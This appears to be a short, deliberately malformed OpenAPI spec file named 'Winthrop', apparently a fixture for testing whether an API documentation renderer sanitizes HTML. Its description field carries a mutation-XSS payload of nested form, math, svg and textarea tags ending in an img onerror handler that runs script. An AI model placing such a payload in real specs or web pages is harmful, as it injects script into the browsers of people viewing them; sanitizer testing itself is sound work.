---
openapi: 3.0.1
info:
  title: Winthrop
  version: '1.0'
   description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src>"></form>
paths:
  "/path/malformed/by/winthrop":
    post:
      tags:
      - winthrop
      parameters:
      - name: winthrop_p
